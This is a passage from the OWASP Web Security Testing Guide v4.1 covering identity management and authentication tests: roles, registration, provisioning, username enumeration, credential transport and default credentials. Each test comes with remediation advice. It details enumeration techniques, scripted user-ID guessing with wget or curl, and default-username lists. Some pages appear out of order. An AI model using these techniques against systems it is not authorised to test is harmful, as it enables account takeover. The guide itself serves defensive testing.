provisioned and explore the permissions that are allowed to be</p><p>applied to the objects including any constraints. If a matrix is provided with the application it should be validated by the</p><p>tester, if it doesn’t exist, the tester should generate it and determine whether the matrix satisfies the desired access</p><p>policy for the application.</p><p>Example 1</p><p>ROLE PERMISSION OBJECT CONSTRAINTS</p><p>Administrator Read Customer records</p><p>Manager Read Customer records Only records related to business unit</p><p>Staff Read Customer records Only records associated with customers assigned by Manager</p><p>Customer Read Customer record Only own record</p><p>A real world example of role definitions can be found in the WordPress roles documentation. WordPress has six default</p><p>roles ranging from Super Admin to a Subscriber.</p><p>Example 2</p><p>Login with admin permission and access pages that only for administrator. Then, login as normal user and try to access</p><p>those administrator pages URL directly.</p><p>1. Login as administrator</p><p>2. Visit admin page. i.e. http://targetSite/Admin</p><p>3. Logout</p><p>4. Login as normal user</p><p>https://wordpress.org/support/article/roles-and-capabilities/</p><p>Web Security Testing Guide v4.1</p><p>129</p><p>5. Visit the admin page URL directly. http://targetSite/Admin</p><p>Tools</p><p>While the most thorough and accurate approach to completing this test is to conduct it manually, spidering tools are</p><p>also useful. Log on with each role in turn and spider the application (don’t forget to exclude the logout link from the</p><p>spidering).</p><p>References</p><p>Role Engineering for Enterprise Security Management, E Coyne & J Davis, 2007</p><p>Role engineering and RBAC standards</p><p>Remediation</p><p>Remediation of the issues can take the following forms:</p><p>Role Engineering</p><p>Mapping of business roles to system roles</p><p>Separation of Duties</p><p>https://www.zaproxy.org/docs/desktop/start/features/spider/</p><p>https://www.bookdepository.co.uk/Role-Engineering-for-Enterprise-Security-Management-Edward-Coyne/9781596932180</p><p>https://csrc.nist.gov/projects/role-based-access-control#rbac-standard</p><p>Web Security Testing Guide v4.1</p><p>130</p><p>Test User Registration Process</p><p>ID</p><p>WSTG-IDNT-02</p><p>Summary</p><p>Some websites offer a user registration process that automates (or semi-automates) the provisioning of system access</p><p>to users. The identity requirements for access vary from positive identification to none at all, depending on the security</p><p>requirements of the system. Many public applications completely automate the registration and provisioning process</p><p>because the size of the user base makes it impossible to manage manually. However, many corporate applications will</p><p>provision users manually, so this test case may not apply.</p><p>Test Objectives</p><p>1. Verify that the identity requirements for user registration are aligned with business and security requirements.</p><p>2. Validate the registration process.</p><p>How to Test</p><p>Verify that the identity requirements for user registration are aligned with business and security requirements:</p><p>1. Can anyone register for access?</p><p>2. Are registrations vetted by a human prior to provisioning, or are they automatically granted if the criteria are</p><p>used in your environment,</p><p>it is time to pick one! The following figure shows a generic SDLC model as well as the (estimated) increasing cost of</p><p>fixing security bugs in such a model.</p><p>Web Security Testing Guide v4.1</p><p>11</p><p>Figure 2-1: Generic SDLC Model</p><p>Companies should inspect their overall SDLC to ensure that security is an integral part of the development process.</p><p>SDLCs should include security tests to ensure security is adequately covered and controls are effective throughout the</p><p>development process.</p><p>What to Test?</p><p>It can be helpful to think of software development as a combination of people, process, and technology. If these are the</p><p>factors that “create” software, then it is logical that these are the factors that must be tested. Today most people</p><p>generally test the technology or the software itself.</p><p>An effective testing program should have components that test the following:</p><p>People – to ensure that there is adequate education and awareness;</p><p>Process – to ensure that there are adequate policies and standards and that people know how to follow these policies;</p><p>Technology – to ensure that the process has been effective in its implementation.</p><p>Web Security Testing Guide v4.1</p><p>12</p><p>Unless a holistic approach is adopted, testing just the technical implementation of an application will not uncover</p><p>management or operational vulnerabilities that could be present. By testing the people, policies, and processes, an</p><p>organization can catch issues that would later manifest themselves into defects in the technology, thus eradicating bugs</p><p>early and identifying the root causes of defects. Likewise, testing only some of the technical issues that can be present</p><p>in a system will result in an incomplete and inaccurate security posture assessment.</p><p>Denis Verdon, Head of Information Security at Fidelity National Financial, presented an excellent analogy for this</p><p>misconception at the OWASP AppSec 2004 Conference in New York:</p><p>If cars were built like applications … safety tests would assume frontal impact only. Cars would not be roll tested,</p><p>or tested for stability in emergency maneuvers, brake effectiveness, side impact, and resistance to theft.</p><p>Feedback and Comments</p><p>As with all OWASP projects, we welcome comments and feedback. We especially like to know that our work is being</p><p>used and that it is effective and accurate.</p><p>Principles of Testing</p><p>There are some common misconceptions when developing a testing methodology to find security bugs in software.</p><p>This chapter covers some of the basic principles that professionals should take into account when performing security</p><p>tests on software.</p><p>There is No Silver Bullet</p><p>While it is tempting to think that a security scanner or application firewall will provide many defenses against attack or</p><p>identify a multitude of problems, in reality there is no silver bullet to the problem of insecure software. Application</p><p>security assessment software, while useful as a first pass to find low-hanging fruit, is generally immature and ineffective</p><p>at in-depth assessments or providing adequate test coverage. Remember that security is a process and not a product.</p><p>Think Strategically, Not Tactically</p><p>Security professionals have come to realize the fallacy of the patch-and-penetrate model that was pervasive in</p><p>information security during the 1990’s. The patch-and-penetrate model involves fixing a reported bug, but without</p><p>proper investigation of the root cause. This model is usually associated with the window of vulnerability, also referred to</p><p>as window of exposure, shown in the figure below. The evolution of vulnerabilities in common software used worldwide</p><p>has shown the ineffectiveness of this model. For more information about windows of exposure, see Schneier on</p><p>Security.</p><p>Vulnerability studies such as Symantec’s Internet Security Threat Report have shown that with the reaction time of</p><p>attackers worldwide, the typical window of vulnerability does not provide enough time for patch installation, since the</p><p>time between a vulnerability being uncovered and an automated attack against it being developed and released is</p><p>decreasing every year.</p><p>There are several incorrect assumptions in the patch-and-penetrate model. Many users believe that patches interfere</p><p>with normal operations or might break existing applications. It is also incorrect to assume that all users are aware of</p><p>newly released patches. Consequently not all users of a product will apply patches, either because they think patching</p><p>may interfere with how the software works, or because they lack knowledge about the existence of the patch.</p><p>https://www.fnf.com/</p><p>https://www.schneier.com/crypto-gram/archives/2000/0915.html</p><p>https://www.symantec.com/security-center/threat-report</p><p>Web Security Testing Guide v4.1</p><p>13</p><p>Figure 2-2: Window of Vulnerability</p><p>It is essential to build security into the Software Development Life Cycle (SDLC) to prevent reoccurring security</p><p>problems within an application. Developers can build security into the SDLC by developing standards, policies, and</p><p>guidelines that fit and work within the development methodology. Threat modeling and other techniques should be</p><p>used to help assign appropriate resources to those parts of a system that are most at risk.</p><p>The SDLC is King</p><p>The SDLC is a process that is well-known to developers. By integrating security into each phase of the SDLC, it allows</p><p>for a holistic approach to application security that leverages the procedures already in place within the organization. Be</p><p>aware that while the names of the various phases may change depending on the SDLC model used by an</p><p>organization, each conceptual phase of the archetype SDLC will be used to develop the application (i.e., define,</p><p>design, develop, deploy, maintain). Each phase has security considerations that should become part of the existing</p><p>process, to ensure a cost-effective and comprehensive security program.</p><p>There are several secure SDLC frameworks in existence that provide both descriptive and prescriptive advice. Whether</p><p>a person takes descriptive or prescriptive advice depends on the maturity of the SDLC process. Essentially, prescriptive</p><p>advice shows how the secure SDLC should work, and descriptive advice shows how it is used in the real world. Both</p><p>have their place. For example, if you don’t know where to start, a prescriptive framework can provide a menu of</p><p>potential security controls that can be applied within the SDLC. Descriptive advice can then help drive the decision</p><p>process by presenting what has worked well for other organizations. Descriptive secure SDLCs include BSIMM-V; and</p><p>the prescriptive secure SDLCs include OWASP’s Open Software Assurance Maturity Model (OpenSAMM) and ISO/IEC</p><p>27034 Parts 1-8, parts of which are still in development.</p><p>Test Early and Test Often</p><p>When a bug is detected early within the SDLC it can be addressed faster and at a lower cost. A security bug is no</p><p>different from a functional or performance-based bug in this regard. A key step in making this possible is to educate the</p><p>development and QA teams about common security issues and the ways to detect and prevent them. Although new</p><p>libraries, tools, or languages can help design programs with fewer security bugs, new threats arise constantly and</p><p>developers must be aware of the threats that affect the software they are developing. Education in security testing also</p><p>helps developers acquire the appropriate mindset to test an application from an attacker’s perspective. This allows</p><p>each organization to consider security issues as part of their existing responsibilities.</p><p>Understand the Scope of Security</p><p>It is important to know how much security a given project will require. The assets that are to be protected should be</p><p>given a classification that states how they are to be handled (e.g., confidential, secret, top secret). Discussions should</p><p>https://www.opensamm.org/</p><p>Web Security Testing Guide v4.1</p><p>14</p><p>occur with legal council to ensure that any specific security requirements will be met. In the USA, requirements might</p><p>come from federal regulations,</p><p>met?</p><p>3. Can the same person or identity register multiple times?</p><p>4. Can users register for different roles or permissions?</p><p>5. What proof of identity is required for a registration to be successful?</p><p>6. Are registered identities verified?</p><p>Validate the registration process:</p><p>1. Can identity information be easily forged or faked?</p><p>2. Can the exchange of identity information be manipulated during registration?</p><p>Example</p><p>In the WordPress example below, the only identification requirement is an email address that is accessible to the</p><p>registrant.</p><p>Web Security Testing Guide v4.1</p><p>131</p><p>Figure 4.3.2-1: Wordpress Registration Page</p><p>In contrast, in the Google example below the identification requirements include name, date of birth, country, mobile</p><p>phone number, email address and CAPTCHA response. While only two of these can be verified (email address and</p><p>mobile number), the identification requirements are stricter than WordPress.</p><p>Figure 4.3.2-2: Google Registration Page</p><p>Tools</p><p>A HTTP proxy can be a useful tool to test this control.</p><p>References</p><p>User Registration Design</p><p>Remediation</p><p>Implement identification and verification requirements that correspond to the security requirements of the information</p><p>the credentials protect.</p><p>https://mashable.com/2011/06/09/user-registration-design/</p><p>Web Security Testing Guide v4.1</p><p>132</p><p>Test Account Provisioning Process</p><p>ID</p><p>WSTG-IDNT-03</p><p>Summary</p><p>The provisioning of accounts presents an opportunity for an attacker to create a valid account without application of the</p><p>proper identification and authorization process.</p><p>Test Objectives</p><p>Verify which accounts may provision other accounts and of what type.</p><p>How to Test</p><p>Determine which roles are able to provision users and what sort of accounts they can provision.</p><p>Is there any verification, vetting and authorization of provisioning requests?</p><p>Is there any verification, vetting and authorization of de-provisioning requests?</p><p>Can an administrator provision other administrators or just users?</p><p>Can an administrator or other user provision accounts with privileges greater than their own?</p><p>Can an administrator or user de-provision themselves?</p><p>How are the files or resources owned by the de-provisioned user managed? Are they deleted? Is access</p><p>transferred?</p><p>Example</p><p>In WordPress, only a user’s name and email address are required to provision the user, as shown below:</p><p>Figure 4.3.3-1: Wordpress User Add</p><p>De-provisioning of users requires the administrator to select the users to be de-provisioned, select Delete from the</p><p>dropdown menu (circled) and then applying this action. The administrator is then presented with a dialog box asking</p><p>what to do with the user’s posts (delete or transfer them).</p><p>Web Security Testing Guide v4.1</p><p>133</p><p>Figure 4.3.3-2: Wordpress Auth and Users</p><p>Tools</p><p>While the most thorough and accurate approach to completing this test is to conduct it manually, HTTP proxy tools</p><p>could be also useful.</p><p>Web Security Testing Guide v4.1</p><p>134</p><p>Testing for Account Enumeration and Guessable User</p><p>Account</p><p>ID</p><p>WSTG-IDNT-04</p><p>Summary</p><p>The scope of this test is to verify if it is possible to collect a set of valid usernames by interacting with the authentication</p><p>mechanism of the application. This test will be useful for brute force testing, in which the tester verifies if, given a valid</p><p>username, it is possible to find the corresponding password.</p><p>Often, web applications reveal when a username exists on system, either as a consequence of mis-configuration or as</p><p>a design decision. For example, sometimes, when we submit wrong credentials, we receive a message that states that</p><p>either the username is present on the system or the provided password is wrong. The information obtained can be</p><p>used by an attacker to gain a list of users on system. This information can be used to attack the web application, for</p><p>example, through a brute force or default username and password attack.</p><p>The tester should interact with the authentication mechanism of the application to understand if sending particular</p><p>requests causes the application to answer in different manners. This issue exists because the information released</p><p>from web application or web server when the user provide a valid username is different than when they use an invalid</p><p>one.</p><p>In some cases, a message is received that reveals if the provided credentials are wrong because an invalid username</p><p>or an invalid password was used. Sometimes, testers can enumerate the existing users by sending a username and an</p><p>empty password.</p><p>How to Test</p><p>In black-box testing, the tester knows nothing about the specific application, username, application logic, error</p><p>messages on log in page, or password recovery facilities. If the application is vulnerable, the tester receives a response</p><p>message that reveals, directly or indirectly, some information useful for enumerating users.</p><p>HTTP Response Message</p><p>Testing for Valid User/Right Password</p><p>Record the server answer when you submit a valid user ID and valid password.</p><p>Using a web proxy, notice the information retrieved from this successful authentication (HTTP 200 Response,</p><p>length of the response).</p><p>Testing for Valid User with Wrong Password</p><p>Now, the tester should try to insert a valid user ID and a wrong password and record the error message generated by</p><p>the application.</p><p>The browser should display a message similar to the following one:</p><p>Figure 4.3.4-1: Authentication Failed</p><p>Web Security Testing Guide v4.1</p><p>135</p><p>or something like:</p><p>Figure 4.3.4-2: No Configuration Found</p><p>against any message that reveals the existence of user, for instance, message similar to:</p><p>Login for User foo: invalid password</p><p>Using a web proxy, notice the information retrieved from this unsuccessful authentication attempt (HTTP 200</p><p>Response, length of the response).</p><p>Testing for a Nonexistent Username</p><p>Now, the tester should try to insert an invalid user ID and a wrong password and record the server answer (the tester</p><p>should be confident that the username is not valid in the application). Record the error message and the server answer.</p><p>If the tester enters a nonexistent user ID, they can receive a message similar to:</p><p>Figure 4.3.4-3: This User is Not Active</p><p>or message like the following one:</p><p>Login failed for User foo: invalid Account</p><p>Generally the application should respond with the same error message and length to the different incorrect</p><p>requests. If the responses are not the same, the tester should investigate and find out the key that creates a</p><p>difference between the two responses. For example:</p><p>Client request: Valid user/wrong password</p><p>Server answer: The password is not correct</p><p>Client request: Wrong user/wrong password</p><p>Server answer:’User not recognized’</p><p>The above responses let the client understand that for the first request they have a valid user name. So they can</p><p>interact with the application requesting a set of possible user IDs and observing the answer.</p><p>Looking at the second server response, the tester understand in the same way that they don’t hold a valid</p><p>username. So they can interact in the same manner and create a list of valid user ID looking at the server answers.</p><p>Other Ways to Enumerate Users</p><p>Testers can enumerate users in several ways, such as:</p><p>Analyzing the Error Code Received on Login Pages</p><p>Some web application release a specific error code or message that we can analyze.</p><p>Analyzing URLs and URLs Re-directions</p><p>Web Security Testing Guide v4.1</p><p>136</p><p>For example:</p><p>http://www.foo.com/err.jsp?User=baduser&Error=0</p><p>http://www.foo.com/err.jsp?User=gooduser&Error=2</p><p>As is seen above, when a tester provides a user ID and password to the web application, they see a message</p><p>indication that an error has occurred in the URL. In the first case they have provided a bad user ID and bad password.</p><p>In the second, a good user ID and a bad password, so they can identify a valid user ID.</p><p>URI Probing</p><p>Sometimes a web server responds differently if it receives a request for an existing directory or not. For instance in</p><p>some portals every user is associated with a directory. If testers</p><p>try to access an existing directory they could receive a</p><p>web server error.</p><p>Some of the common errors received from web servers are:</p><p>403 Forbidden error code</p><p>404 Not found error code</p><p>Example:</p><p>http://www.foo.com/account1 - we receive from web server: 403 Forbidden</p><p>http://www.foo.com/account2 -wereceivefromwebserver:404fileNotFound</p><p>In the first case the user exists, but the tester cannot view the web page, in second case instead the user “account2”</p><p>does not exist. By collecting this information testers can enumerate the users.</p><p>Analyzing Web Page Titles</p><p>Testers can receive useful information on Title of web page, where they can obtain a specific error code or messages</p><p>that reveal if the problems are with the username or password.</p><p>For instance, if a user cannot authenticate to an application and receives a web page whose title is similar to:</p><p>Invalid user</p><p>Invalid authentication</p><p>Analyzing a Message Received from a Recovery Facility</p><p>When we use a recovery facility (i.e. a forgotten password function) a vulnerable application might return a message</p><p>that reveals if a username exists or not.</p><p>For example, message similar to the following:</p><p>Invalid username: e-mail address is not valid or the specified user was not found.</p><p>Valid username: Your password has been successfully sent to the email address you registered with.</p><p>Friendly 404 Error Message</p><p>When we request a user within the directory that does not exist, we don’t always receive 404 error code. Instead, we</p><p>may receive “200 ok” with an image, in this case we can assume that when we receive the specific image the user does</p><p>not exist. This logic can be applied to other web server response; the trick is a good analysis of web server and web</p><p>application messages.</p><p>Analyzing Response Times</p><p>As well as looking at the content of the responses, the time that the response take should also be considered.</p><p>Particularly where the request causes an interaction with an external service (such as sending a forgotten password</p><p>Web Security Testing Guide v4.1</p><p>137</p><p>email), this can add several hundred milliseconds to the response, which can be used to determine whether the</p><p>requested user is valid.</p><p>Guessing Users</p><p>In some cases the user IDs are created with specific policies of administrator or company. For example we can view a</p><p>user with a user ID created in sequential order:</p><p>CN000100</p><p>CN000101</p><p>...</p><p>Sometimes the usernames are created with a REALM alias and then a sequential numbers:</p><p>R1001 – user 001 for REALM1</p><p>R2001 – user 001 for REALM2</p><p>In the above sample we can create simple shell scripts that compose user IDs and submit a request with tool like wget</p><p>to automate a web query to discern valid user IDs. To create a script we can also use Perl and CURL.</p><p>Other possibilities are: - user IDs associated with credit card numbers, or in general numbers with a pattern. - user IDs</p><p>associated with real names, e.g. if Freddie Mercury has a user ID of “fmercury”, then you might guess Roger Taylor to</p><p>have the user ID of “rtaylor”.</p><p>Again, we can guess a username from the information received from an LDAP query or from Google information</p><p>gathering, for example, from a specific domain. Google can help to find domain users through specific queries or</p><p>through a simple shell script or tool.</p><p>by enumerating user accounts, you risk locking out accounts after a predefined number of failed probes (based on</p><p>application policy). Also, sometimes, your IP address can be banned by dynamic rules on the application firewall</p><p>or Intrusion Prevention System.</p><p>Gray-Box Testing</p><p>Testing for Authentication Error Messages</p><p>Verify that the application answers in the same manner for every client request that produces a failed authentication.</p><p>For this issue the black-box testing and gray-box testing have the same concept based on the analysis of messages or</p><p>error codes received from web application.</p><p>The application should answer in the same manner for every failed attempt of authentication. For Example:</p><p>Credentials submitted are not valid</p><p>Tools</p><p>OWASP Zed Attack Proxy (ZAP)</p><p>CURL</p><p>PERL</p><p>References</p><p>Marco Mella, Sun Java Access & Identity Manager Users enumeration</p><p>Username Enumeration Vulnerabilities</p><p>Remediation</p><p>Ensure the application returns consistent generic error messages in response to invalid account name, password or</p><p>other user credentials entered during the log in process.</p><p>https://www.zaproxy.org/</p><p>https://curl.haxx.se/</p><p>https://www.perl.org/</p><p>https://securiteam.com/exploits/5ep0f0uquo/</p><p>https://www.gnucitizen.org/blog/username-enumeration-vulnerabilities/</p><p>Web Security Testing Guide v4.1</p><p>138</p><p>Ensure default system accounts and test accounts are deleted prior to releasing the system into production (or</p><p>exposing it to an untrusted network).</p><p>Web Security Testing Guide v4.1</p><p>139</p><p>Testing for Weak or Unenforced Username Policy</p><p>ID</p><p>WSTG-IDNT-05</p><p>Summary</p><p>User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account</p><p>name is fnurks) and valid account names can easily be guessed.</p><p>Test Objectives</p><p>Determine whether a consistent account name structure renders the application vulnerable to account enumeration.</p><p>Determine whether the application’s error messages permit account enumeration.</p><p>How to Test</p><p>Determine the structure of account names.</p><p>Evaluate the application’s response to valid and invalid account names.</p><p>Use different responses to valid and invalid account names to enumerate valid account names.</p><p>Use account name dictionaries to enumerate valid account names.</p><p>Remediation</p><p>Ensure the application returns consistent generic error messages in response to invalid account name, password or</p><p>other user credentials entered during the log in process.</p><p>Web Security Testing Guide v4.1</p><p>140</p><p>4.4 Authentication Testing</p><p>4.4.1 Testing for Credentials Transported over an Encrypted Channel</p><p>4.4.2 Testing for Default Credentials</p><p>4.4.3 Testing for Weak Lock Out Mechanism</p><p>4.4.4 Testing for Bypassing Authentication Schema</p><p>4.4.5 Testing for Vulnerable Remember Password</p><p>4.4.6 Testing for Browser Cache Weaknesses</p><p>4.4.7 Testing for Weak Password Policy</p><p>4.4.8 Testing for Weak Security Question Answer</p><p>4.4.9 Testing for Weak Password Change or Reset Functionalities</p><p>4.4.10 Testing for Weaker Authentication in Alternative Channel</p><p>Web Security Testing Guide v4.1</p><p>141</p><p>Testing for Credentials Transported over an Encrypted</p><p>Channel</p><p>ID</p><p>WSTG-ATHN-01</p><p>Summary</p><p>Testing for credentials transport means verifying that the user’s authentication data are transferred via an encrypted</p><p>channel to avoid being intercepted by malicious users. The analysis focuses simply on trying to understand if the data</p><p>travels unencrypted from the web browser to the server, or if the web application takes the appropriate security</p><p>measures using a protocol like HTTPS. The HTTPS protocol is built on TLS/SSL to encrypt the data that is transmitted</p><p>and to ensure that user is being sent towards the desired site.</p><p>Clearly, the fact that traffic is encrypted does not necessarily mean that it’s completely safe. The security also depends</p><p>on the encryption algorithm used and the robustness of the keys that the application is using, but this particular topic</p><p>will not be addressed in this section.</p><p>For a more detailed discussion on testing the safety of TLS/SSL channels refer to the chapter Testing for Weak SSL TLS</p><p>Ciphers Insufficient Transport Layer Protection. Here, the tester will just try to understand if the data that users put in to</p><p>web forms in order to log in to a web site, are transmitted using secure protocols that protect them from an attacker.</p><p>Nowadays, the most common example of this issue is the log in page of a web application. The tester should verify that</p><p>user’s credentials are transmitted via an encrypted channel. In order to log in to a web site, the user usually has to fill a</p><p>simple form that transmits the inserted data to the web application with the POST method. What is less obvious is that</p><p>this data can be passed using the HTTP protocol, which transmits the data</p><p>in a non-secure, clear text form, or using the</p><p>HTTPS protocol, which encrypts the data during the transmission. To further complicate things, there is the possibility</p><p>that the site has the login page accessible via HTTP (making us believe that the transmission is insecure), but then it</p><p>actually sends data via HTTPS. This test is done to be sure that an attacker cannot retrieve sensitive information by</p><p>simply sniffing the network with a sniffer tool.</p><p>How to Test</p><p>Black-Box Testing</p><p>In the following examples we will use a web proxy in order to capture packet headers and to inspect them. You can use</p><p>any web proxy that you prefer.</p><p>Example 1: Sending Data with POST Method Through HTTP</p><p>Suppose that the login page presents a form with fields User, Pass, and the Submit button to authenticate and give</p><p>access to the application. If we look at the headers of our request with a web proxy, we can get something like this:</p><p>POST http://www.example.com/AuthenticationServlet HTTP/1.1</p><p>Host: www.example.com</p><p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.14) Gecko/20080404</p><p>Accept: text/xml,application/xml,application/xhtml+xml</p><p>Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3</p><p>Accept-Encoding: gzip,deflate</p><p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</p><p>Keep-Alive: 300</p><p>Connection: keep-alive</p><p>Referer: http://www.example.com/index.jsp</p><p>Cookie: JSESSIONID=LVrRRQQXgwyWpW7QMnS49vtW1yBdqn98CGlkP4jTvVCGdyPkmn3S!</p><p>Content-Type: application/x-www-form-urlencoded</p><p>Content-length: 64</p><p>Web Security Testing Guide v4.1</p><p>142</p><p>delegated_service=218&User=test&Pass=test&Submit=SUBMIT</p><p>From this example the tester can understand that the POST request sends the data to the page</p><p>www.example.com/AuthenticationServlet using HTTP. So the data is transmitted without encryption and a malicious</p><p>user could intercept the username and password by simply sniffing the network with a tool like Wireshark.</p><p>Example 2: Sending Data with POST Method Through HTTPS</p><p>Suppose that our web application uses the HTTPS protocol to encrypt the data we are sending (or at least for</p><p>transmitting sensitive data like credentials). In this case, when logging on to the web application the header of our</p><p>POST request would be similar to the following:</p><p>POST https://www.example.com:443/cgi-bin/login.cgi HTTP/1.1</p><p>Host: www.example.com</p><p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.14) Gecko/20080404</p><p>Accept: text/xml,application/xml,application/xhtml+xml,text/html</p><p>Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3</p><p>Accept-Encoding: gzip,deflate</p><p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</p><p>Keep-Alive: 300</p><p>Connection: keep-alive</p><p>Referer: https://www.example.com/cgi-bin/login.cgi</p><p>Cookie: language=English;</p><p>Content-Type: application/x-www-form-urlencoded</p><p>Content-length: 50</p><p>Command=Login&User=test&Pass=test</p><p>We can see that the request is addressed to www.example.com:443/cgi-bin/login.cgi using the HTTPS protocol.</p><p>This ensures that our credentials are sent using an encrypted channel and that the credentials are not readable by a</p><p>malicious user using a sniffer.</p><p>Example 3: Sending Data with POST Method via HTTPS on a Page Reachable via HTTP</p><p>Now, imagine having a web page reachable via HTTP and that only data sent from the authentication form are</p><p>transmitted via HTTPS. This situation occurs, for example, when we are on a portal of a big company that offers various</p><p>information and services that are publicly available, without identification, but the site also has a private section</p><p>accessible from the home page when users log in. So when we try to log in, the header of our request will look like the</p><p>following example:</p><p>POST https://www.example.com:443/login.do HTTP/1.1</p><p>Host: www.example.com</p><p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.14) Gecko/20080404</p><p>Accept: text/xml,application/xml,application/xhtml+xml,text/html</p><p>Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3</p><p>Accept-Encoding: gzip,deflate</p><p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</p><p>Keep-Alive: 300</p><p>Connection: keep-alive</p><p>Referer: http://www.example.com/homepage.do</p><p>Cookie: SERVTIMSESSIONID=s2JyLkvDJ9ZhX3yr5BJ3DFLkdphH0QNSJ3VQB6pLhjkW6F</p><p>Content-Type: application/x-www-form-urlencoded</p><p>Content-length: 45</p><p>User=test&Pass=test&portal=ExamplePortal</p><p>We can see that our request is addressed to www.example.com:443/login.do using HTTPS. But if we have a look at</p><p>the Referer-header (the page from which we came), it is www.example.com/homepage.do and is accessible via simple</p><p>HTTP. Although we are sending data via HTTPS, this deployment can allow SSLStrip attacks.</p><p>https://www.wireshark.org/</p><p>https://moxie.org/software/sslstrip/</p><p>Web Security Testing Guide v4.1</p><p>143</p><p>The above mentioned attack is a Man-in-the-middle attack.</p><p>Example 4: Sending Data with GET Method Through HTTPS</p><p>In this last example, suppose that the application transfers data using the GET method. This method should never be</p><p>used in a form that transmits sensitive data such as username and password, because the data is displayed in clear</p><p>text in the URL and this causes a whole set of security issues. For example, the URL that is requested is easily</p><p>available from the server logs or from your browser history, which makes your sensitive data retrievable for</p><p>unauthorized persons. So this example is purely demonstrative, but, in reality, it is strongly suggested to use the POST</p><p>method instead.</p><p>GET https://www.example.com/success.html?user=test&pass=test HTTP/1.1</p><p>Host: www.example.com</p><p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.14) Gecko/20080404</p><p>Accept: text/xml,application/xml,application/xhtml+xml,text/html</p><p>Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3</p><p>Accept-Encoding: gzip,deflate</p><p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</p><p>Keep-Alive: 300</p><p>Connection: keep-alive</p><p>Referer: https://www.example.com/form.html</p><p>If-Modified-Since: Mon, 30 Jun 2008 07:55:11 GMT</p><p>If-None-Match: "43a01-5b-4868915f"</p><p>You can see that the data is transferred in clear text in the URL and not in the body of the request as before. But we</p><p>must consider that SSL/TLS is a level 5 protocol, a lower level than HTTP, so the whole HTTP packet is still encrypted</p><p>making the URL unreadable to a malicious user using a sniffer. Nevertheless as stated before, it is not a good practice</p><p>to use the GET method to send sensitive data to a web application, because the information contained in the URL can</p><p>be stored in many locations such as proxy and web server logs.</p><p>Gray-Box Testing</p><p>Speak with the developers of the web application and try to understand if they are aware of the differences between</p><p>HTTP and HTTPS protocols and why they should use HTTPS for transmitting sensitive information. Then, check with</p><p>them if HTTPS is used in every sensitive request, like those in log in pages, to prevent unauthorized users to intercept</p><p>the data.</p><p>Tools</p><p>OWASP Zed Attack Proxy (ZAP)</p><p>mitmproxy</p><p>Burp Suite</p><p>Wireshark</p><p>TCPDUMP</p><p>References</p><p>Whitepapers</p><p>HTTP/1.1: Security Considerations</p><p>SSL is not about encryption</p><p>https://en.wikipedia.org/wiki/Man-in-the-middle_attack</p><p>https://owasp.org/www-project-zap/</p><p>https://mitmproxy.org/</p><p>https://portswigger.net/burp</p><p>https://www.wireshark.org/</p><p>https://www.tcpdump.org/</p><p>https://www.w3.org/Protocols/rfc2616/rfc2616-sec15.html</p><p>https://www.troyhunt.com/ssl-is-not-about-encryption/</p><p>Web Security Testing Guide v4.1</p><p>144</p><p>Testing for Default Credentials</p><p>ID</p><p>WSTG-ATHN-02</p><p>Summary</p><p>Nowadays web applications often make use of popular open source or commercial software that can be installed on</p><p>servers with minimal configuration or customization by the server administrator. Moreover, a lot of hardware appliances</p><p>(i.e. network routers and database servers) offer web-based configuration or administrative interfaces.</p><p>Often these applications, once installed, are not properly configured and the default credentials provided for initial</p><p>authentication and configuration are never changed. These default credentials are well known by penetration testers</p><p>and, unfortunately,</p><p>also by malicious attackers, who can use them to gain access to various types of applications.</p><p>Furthermore, in many situations, when a new account is created on an application, a default password (with some</p><p>standard characteristics) is generated. If this password is predictable and the user does not change it on the first</p><p>access, this can lead to an attacker gaining unauthorized access to the application.</p><p>The root cause of this problem can be identified as:</p><p>Inexperienced IT personnel, who are unaware of the importance of changing default passwords on installed</p><p>infrastructure components, or leave the password as default for “ease of maintenance”.</p><p>Programmers who leave back doors to easily access and test their application and later forget to remove them.</p><p>Applications with built-in non-removable default accounts with a preset username and password.</p><p>Applications that do not force the user to change the default credentials after the first log in.</p><p>How to Test</p><p>Testing for Default Credentials of Common Applications</p><p>In black-box testing the tester knows nothing about the application and its underlying infrastructure. In reality this is</p><p>often not true, and some information about the application is known. We suppose that you have identified, through the</p><p>use of the techniques described in this Testing Guide under the chapter Information Gathering, at least one or more</p><p>common applications that may contain accessible administrative interfaces.</p><p>When you have identified an application interface, for example a Cisco router web interface or a WebLogic</p><p>administrator portal, check that the known usernames and passwords for these devices do not result in successful</p><p>authentication. To do this you can consult the manufacturer’s documentation or, in a much simpler way, you can find</p><p>common credentials using a search engine or by using one of the sites or tools listed in the Reference section.</p><p>When facing applications where we do not have a list of default and common user accounts (for example due to the fact</p><p>that the application is not wide spread) we can attempt to guess valid default credentials. Note that the application</p><p>being tested may have an account lockout policy enabled, and multiple password guess attempts with a known</p><p>username may cause the account to be locked. If it is possible to lock the administrator account, it may be troublesome</p><p>for the system administrator to reset it.</p><p>Many applications have verbose error messages that inform the site users as to the validity of entered usernames. This</p><p>information will be helpful when testing for default or guessable user accounts. Such functionality can be found, for</p><p>example, on the log in page, password reset and forgotten password page, and sign up page. Once you have found a</p><p>default username you could also start guessing passwords for this account.</p><p>Web Security Testing Guide v4.1</p><p>145</p><p>More information about this procedure can be found in the section Testing for User Enumeration and Guessable User</p><p>Account and in the section Testing for Weak password policy.</p><p>Since these types of default credentials are often bound to administrative accounts you can proceed in this manner:</p><p>Try the following usernames - “admin”, “administrator”, “root”, “system”, “guest”, “operator”, or “super”. These are</p><p>popular among system administrators and are often used. Additionally you could try “qa”, “test”, “test1”, “testing”</p><p>and similar names. Attempt any combination of the above in both the username and the password fields. If the</p><p>application is vulnerable to username enumeration, and you manage to successfully identify any of the above</p><p>usernames, attempt passwords in a 